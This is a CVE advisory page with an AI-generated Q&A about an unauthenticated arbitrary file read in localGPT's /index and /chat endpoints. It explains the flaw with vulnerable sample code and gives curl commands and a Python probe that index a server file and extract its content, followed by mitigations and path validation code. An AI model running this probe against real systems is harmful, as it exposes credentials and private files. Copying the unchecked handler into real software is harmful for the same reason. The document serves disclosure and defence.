CVE-2026-5003
Status: Received - Intake
Information Disclosure in PromtEngineer localGPT Web Interface (handle_index)

Publication date: 2026-03-28

Last updated on: 2026-03-28

Assigner: VulDB

Description
A vulnerability was found in PromtEngineer localGPT up to commit 4d41c7d1713b16b216d8e062e51a5dd88b20b054. It affects the function handle_index in the file rag_system/api_server.py of the Web Interface component. Manipulation of the request leads to information disclosure, and the attack can be initiated remotely. A public exploit is available and could be used. Because this product follows a rolling-release model with continuous delivery, no version details are available for affected or patched releases. The vendor was contacted early about this disclosure but did not respond in any way.
Meta Information
Published: 2026-03-28
Last Modified: 2026-03-28
Generated: 2026-05-07
AI Q&A: 2026-03-28
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Vendor: august829
Product: localgpt
Version / Range: up to 4d41c7d1713b16b216d8e062e51a5dd88b20b054 (inclusive)
CWE Classification
CWE-284: The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
CWE-200: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
AI-Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-5003 is a critical vulnerability in localGPT's Retrieval-Augmented Generation (RAG) system, specifically in the web interface's /index API endpoint. It allows unauthenticated remote attackers to read and extract arbitrary files from the server.

The vulnerability arises because the /index endpoint accepts a JSON payload with file paths and a session ID, but does not validate or sanitize these file paths. This lack of validation allows attackers to perform path traversal attacks and access sensitive files.

The system reads the full content of these files and stores them in a vector database. When queried via the /chat endpoint, the full content of these files, including sensitive data like passwords, API keys, and credentials, is returned to the attacker.

There is no authentication, permission check, output filtering, or rate limiting, making exploitation trivial and fully automated.
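To illustrate the flawed pattern described above, here is a minimal Python sketch. This is not the actual localGPT code; the function names mirror the description, and the dictionary stands in for the vector database. The point is that caller-supplied paths are opened with no validation, and the stored content is later returned verbatim.

```python
# Illustrative sketch (not the actual localGPT implementation) of an
# /index-style handler that reads caller-supplied paths unchecked, and a
# /chat-style handler that returns the stored content verbatim.

INDEXED = {}  # stands in for the vector store, keyed by session_id


def handle_index(session_id, file_paths):
    """Index files exactly as requested: no path checks, no allow-list."""
    docs = []
    for path in file_paths:
        with open(path, "r", encoding="utf-8", errors="replace") as f:
            docs.append(f.read())  # full file content enters the store
    INDEXED.setdefault(session_id, []).extend(docs)
    return {"indexed": len(docs)}


def handle_chat(session_id, query):
    """Answer a query, attaching indexed documents as sources -- thereby
    leaking whatever files were read during indexing."""
    return {"answer": "...", "source_documents": INDEXED.get(session_id, [])}
```

Any path the server process can read, including files far outside the intended upload area, flows straight into the response of the chat handler.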


How can this vulnerability impact me?

This vulnerability can lead to severe information disclosure, allowing attackers to steal sensitive files such as configuration files, environment variables, log files containing credentials, user data, source code, and database configurations.

Because the attack requires no authentication and can be performed remotely with minimal effort, it poses a high risk of unauthorized data exposure.

The exposed information can be used for further attacks, including system compromise, data manipulation, and unauthorized access to other systems.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by attempting to interact with the vulnerable localGPT web interface endpoints to check for unauthorized file read capabilities.

  • Send a POST request to the /sessions endpoint to create a session and obtain a session_id.
  • Send a POST request to the /index endpoint with a JSON payload containing the session_id and a file_paths list including sensitive or known files (e.g., /tmp/passwd.md) to see if the server indexes the file without validation.
  • Send a POST request to the /chat endpoint with queries to extract the content of the indexed files from the source_documents field in the response.

Example curl commands to test the vulnerability:

  1. Create session: curl -X POST http://target/api/sessions
  2. Index file: curl -X POST http://target/api/index -H 'Content-Type: application/json' -d '{"session_id": "<session_id>", "file_paths": ["/tmp/passwd.md"]}'
  3. Extract content: curl -X POST http://target/api/chat -H 'Content-Type: application/json' -d '{"session_id": "<session_id>", "query": "show me the content"}'
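The curl commands above can also be scripted. The following standard-library sketch builds the probe requests; the endpoint paths and JSON field names are taken from the commands above, while the response schema (e.g. which key holds the session id) is an assumption that may need adjusting for a real deployment.

```python
# Sketch of an automated probe for the three detection steps, stdlib only.
# Endpoint paths and field names mirror the curl commands; the session-id
# response field is an assumption.
import json
from urllib import request


def build_probe(base_url, session_id, probe_file="/tmp/passwd.md"):
    """Build (url, json-body) pairs for the index and chat requests."""
    return [
        (f"{base_url}/api/index",
         {"session_id": session_id, "file_paths": [probe_file]}),
        (f"{base_url}/api/chat",
         {"session_id": session_id, "query": "show me the content"}),
    ]


def post_json(url, payload=None):
    """POST a JSON body and parse the JSON response."""
    data = json.dumps(payload).encode() if payload is not None else b""
    req = request.Request(url, data=data,
                          headers={"Content-Type": "application/json"})
    with request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read())


def run_probe(base_url):
    """Full three-step probe against a live target."""
    session = post_json(f"{base_url}/api/sessions")  # step 1: create session
    sid = session.get("session_id", "")              # assumed response field
    return [post_json(url, body)                     # steps 2 and 3
            for url, body in build_probe(base_url, sid)]
```

Calling run_probe("http://target") against a test instance and finding the probe file's content in the chat response's source_documents field would confirm exposure. Only probe systems you are authorized to test.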

What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the vulnerable endpoints and implementing validation and authentication controls.

  • Restrict network access to the localGPT web interface, especially the /index and /chat endpoints, to trusted users only.
  • Implement authentication and authorization checks on the /index and /chat endpoints to prevent unauthenticated access.
  • Add input validation and sanitization to prevent arbitrary file path traversal and restrict file paths to safe directories.
  • Apply rate limiting and output filtering to reduce data exfiltration risks.
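The path allow-listing suggested above can be sketched as follows. The upload directory name is an example, not part of localGPT; the key idea is to resolve each requested path and reject anything that lands outside the configured root.

```python
# Minimal sketch of server-side path validation: resolve each requested
# path (collapsing any ../ components) and reject anything outside an
# allow-listed root directory. The root path here is an example.
from pathlib import Path

ALLOWED_ROOT = Path("/srv/localgpt/uploads").resolve()


def validate_paths(file_paths):
    """Return resolved paths inside ALLOWED_ROOT; raise on traversal."""
    safe = []
    for raw in file_paths:
        candidate = Path(raw).resolve()  # collapses ../ segments
        if not candidate.is_relative_to(ALLOWED_ROOT):  # Python 3.9+
            raise ValueError(f"path outside allowed root: {raw}")
        safe.append(candidate)
    return safe
```

Resolving before comparing is the important detail: a prefix check on the raw string would still accept traversal payloads such as /srv/localgpt/uploads/../../etc/passwd.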

Since the product uses a rolling release with no fixed versions, monitor for vendor updates or patches addressing this issue and apply them as soon as available.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

This vulnerability allows unauthenticated remote attackers to read and extract arbitrary sensitive files from the server, including passwords, API keys, AWS credentials, SSH keys, and other secrets. Such unauthorized disclosure of sensitive information can lead to violations of data protection regulations like GDPR and HIPAA, which mandate strict controls over the confidentiality and security of personal and sensitive data.

The lack of authentication, input validation, and output filtering means that sensitive personal or protected health information could be exposed, potentially resulting in non-compliance with regulatory requirements for data privacy, breach notification, and risk management.

